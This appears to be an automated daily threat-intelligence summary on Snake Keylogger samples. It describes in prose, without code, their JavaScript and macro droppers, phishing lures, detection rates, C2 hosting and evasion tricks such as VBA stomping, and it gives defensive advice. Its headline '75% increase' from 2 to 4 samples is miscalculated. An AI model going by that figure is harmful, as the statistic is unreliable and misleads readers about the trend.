Daily Summary
Snake Keylogger activity surged today with 4 new samples detected, a 75% increase over the 7-day average of 2. This marks the highest single-day count this week, driven by a shift in distribution tactics.
New Samples Detected
Three of the four samples are JavaScript (.js) droppers, with one .xlam Excel add-in file. The .js files use obfuscated variable names and invoke WScript.Shell to download and execute the payload from remote servers. The .xlam variant leverages VBA macros with auto-open triggers, a departure from the recent PDF-based delivery methods seen last month. File naming is generic, using strings like “invoice_22.js” and “report_22.xlam” to mimic business correspondence.
Distribution Methods
The .js samples suggest email attachment campaigns targeting users who double-click scripts disguised as documents. The .xlam file indicates a pivot toward macro-enabled Office attachments, likely distributed via phishing emails with subject lines referencing urgent payments or shipping updates. No signs of exploit kits or malvertising were observed today.
Detection Rate
Of the four samples submitted to VirusTotal, average detection rates were moderate: the .js files scored 5-7 out of 60 engines, while the .xlam file achieved only 3 detections. The use of custom packers and string obfuscation in the JavaScript variants may be evading signature-based detection. SOC teams should supplement with behavioral analytics.
C2 Infrastructure
No new C2 servers were identified today. Active servers remain concentrated in Russia and the Netherlands, using HTTP POST requests with encrypted payloads over port 443. No shifts in SSL certificate patterns were observed.
7-Day Trend
Activity is ramping up after a lull mid-week, with today’s spike doubling the previous high of 2 samples on April 18. The 75% surge suggests campaign operators are testing new delivery vectors.
Security Analysis
The coexistence of .js and .xlam samples today is notable, as Snake Keylogger traditionally favors one file type per campaign. This dual-pronged approach may indicate operators A/B testing distribution methods or targeting different verticals simultaneously. The .xlam variant’s low detection rate is concerning, as it leverages VBA stomping to evade macro analysis. Defenders should enforce execution policies that block JavaScript files from email attachments and disable Office macros for non-trusted sources.